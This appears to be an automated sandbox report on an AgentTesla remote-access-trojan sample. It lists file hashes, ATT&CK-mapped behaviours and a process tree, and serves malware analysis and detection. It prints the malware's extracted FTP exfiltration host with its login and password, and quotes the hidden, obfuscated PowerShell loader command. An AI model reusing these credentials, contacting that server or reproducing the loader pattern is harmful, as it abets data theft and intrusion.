Analysis
-
max time kernel
149s -
max time network
275s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-01-2025 01:02
Static task
static1
Behavioral task
behavioral1
Sample
Tangforlsendes.exe
Resource
win7-20240903-en
General
-
Target
Tangforlsendes.exe
-
Size
1.5MB
-
MD5
2a3b0c09fb6332a4c35439c0741a3c61
-
SHA1
1de70829cc27202b8b64235fb19829d32ac72ee1
-
SHA256
67e5c1745d2c3382e6f20e2d7cd876acb687f7859aae4cd2b6b9fae6ca5a441e
-
SHA512
901b724023e0ed87ddd483dae7c2c6c2269bb7115f1bfbf87a0b45efd77e20b7bcab183f60b1784ef92d86a6f04e76e719fe2a4d25794304ccc6aebd4bcd7f25
-
SSDEEP
24576:vmwBXOxw33BYQ+0EnWF9gfJmc6Ns2VDdAVjaP+4a8ztxQX8F9toOSZD98+/1c:DXtY0iJ56nVQjaLa8ztisXuRg
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.carbognin.it - Port:
21 - Username:
[email protected] - Password:
59Cif8wZUH#X
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 880 powershell.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 4884 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4884 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 880 powershell.exe 4884 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2284 4884 WerFault.exe 95 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Tangforlsendes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 880 powershell.exe 880 powershell.exe 880 powershell.exe 880 powershell.exe 880 powershell.exe 880 powershell.exe 880 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 880 powershell.exe Token: SeIncreaseQuotaPrivilege 880 powershell.exe Token: SeSecurityPrivilege 880 powershell.exe Token: SeTakeOwnershipPrivilege 880 powershell.exe Token: SeLoadDriverPrivilege 880 powershell.exe Token: SeSystemProfilePrivilege 880 powershell.exe Token: SeSystemtimePrivilege 880 powershell.exe Token: SeProfSingleProcessPrivilege 880 powershell.exe Token: SeIncBasePriorityPrivilege 880 powershell.exe Token: SeCreatePagefilePrivilege 880 powershell.exe Token: SeBackupPrivilege 880 powershell.exe Token: SeRestorePrivilege 880 powershell.exe Token: SeShutdownPrivilege 880 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeSystemEnvironmentPrivilege 880 powershell.exe Token: SeRemoteShutdownPrivilege 880 powershell.exe Token: SeUndockPrivilege 880 powershell.exe Token: SeManageVolumePrivilege 880 powershell.exe Token: 33 880 powershell.exe Token: 34 880 powershell.exe Token: 35 880 powershell.exe Token: 36 880 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4812 wrote to memory of 880 4812 Tangforlsendes.exe 83 PID 4812 wrote to memory of 880 4812 Tangforlsendes.exe 83 PID 4812 wrote to memory of 880 4812 Tangforlsendes.exe 83 PID 880 wrote to memory of 4884 880 powershell.exe 95 PID 880 wrote to memory of 4884 880 powershell.exe 95 PID 880 wrote to memory of 4884 880 powershell.exe 95 PID 880 wrote to memory of 4884 880 powershell.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tangforlsendes.exe"C:\Users\Admin\AppData\Local\Temp\Tangforlsendes.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Salpiform=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\Liste\Chambrays28\Folkevognsrugbrdene\Basted.Non';$Safianbogbinds=$Salpiform.SubString(36731,3);.$Safianbogbinds($Salpiform)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 15804⤵
- Program crash
PID:2284
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 48841⤵PID:640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
72KB
MD58c216f66e8374e616d44d14c9c875497
SHA1ed495bc4ddbd10ec45e22ba94bdb4b4c82b6acaf
SHA2569ea81c8c46e2a8999e75c17e5e27887915638672b01946e4fb3fb7166934fb97
SHA5125236ad4c43796b5245aad3a475b37d88478b286371e6cea36aec30b0d1d7cf0192716bb545b8721a8984d14db45cd14e769176831ec220207d0b65d9c78e542d
-
Filesize
343KB
MD5de7d9362c8b4bb9162093ac7d0a432dc
SHA1719babc0986b013d8b1349bd56c9ad697fcec16b
SHA256389095f9cf77f78a7831021b84a312ce2b85637a9ac2ad8b922d11cee7e98fb6
SHA512bc26b14092327391e43126d714bca50984a0387ca5f6f2b20c97f25d0e925d4d3bc0d0bb014dc0fd7fa14c3c92568a670c89c87d878da0e3d5d6abc2873eac51
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82